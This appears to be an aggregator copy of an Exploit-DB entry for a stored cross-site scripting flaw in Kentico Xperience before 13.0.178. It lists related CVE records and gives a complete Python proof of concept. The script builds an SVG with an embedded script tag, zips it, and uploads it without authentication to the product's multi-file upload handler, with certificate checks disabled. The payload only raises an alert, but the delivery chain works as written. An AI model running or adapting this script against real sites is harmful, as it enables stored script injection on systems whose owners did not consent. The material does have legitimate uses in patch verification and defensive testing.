Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)

🗓️ 13 May 2025 00:00:00Reported by Alex MesshamType

exploitdb🔗 www.exploit-db.com👁 411 Views

Kentico Xperience 13.0.178 has an XSS vulnerability via SVG payload upload before version 13.0.178.

Reporter	Title	Published	Views	Family All 31
Circl	CVE-2025-2748	24 Mar 202522:35	–	circl
Circl	CVE-2025-32370	6 Apr 202507:38	–	circl
CNNVD	Kentico Xperience 跨站脚本漏洞	24 Mar 202500:00	–	cnnvd
CNNVD	Kentico Xperience 跨站脚本漏洞	6 Apr 202500:00	–	cnnvd
CNVD	Kentico Xperience cross-site scripting vulnerability (CNVD-2026-05133)	10 Apr 202500:00	–	cnvd
CNVD	Kentico Xperience Cross-Site Scripting Vulnerability	28 Mar 202500:00	–	cnvd
CVE	CVE-2025-2748	24 Mar 202518:22	–	cve
CVE	CVE-2025-32370	6 Apr 202500:00	–	cve
Cvelist	CVE-2025-2748 Kentico Xperience stored cross-site scripting in multiple-file upload functionality	24 Mar 202518:22	–	cvelist
Cvelist	CVE-2025-32370	6 Apr 202500:00	–	cvelist

# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: [email protected]
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370

import requests
import subprocess
import os
import argparse

def create_svg_payload(svg_filename: str):
    print(f"[*] Writing malicious SVG to: {svg_filename}")
    svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
 xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
    with open(svg_filename, 'w') as f:
        f.write(svg_payload)

def zip_payload(svg_filename: str, zip_filename: str):
    print(f"[*] Creating zip archive: {zip_filename}")
    subprocess.run(['zip', zip_filename, svg_filename], check=True)

def upload_zip(zip_filename: str, target_url: str):
    full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
    headers = {
        "Content-Type": "application/octet-stream"
    }

    print(f"[+] Uploading {zip_filename} to {full_url}")
    with open(zip_filename, 'rb') as f:
        response = requests.post(full_url, headers=headers, data=f,
verify=False)

    if response.status_code == 200:
        print("[+] Upload succeeded")
    else:
        print(f"[-] Upload failed with status code {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
    parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
    parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
    parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")

    args = parser.parse_args()

    create_svg_payload(args.svg)
    zip_payload(args.svg, args.zip)
    upload_zip(args.zip, args.url)
```

13 May 2025 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 3.17.2 - 9.8

EPSS0.00544

SSVC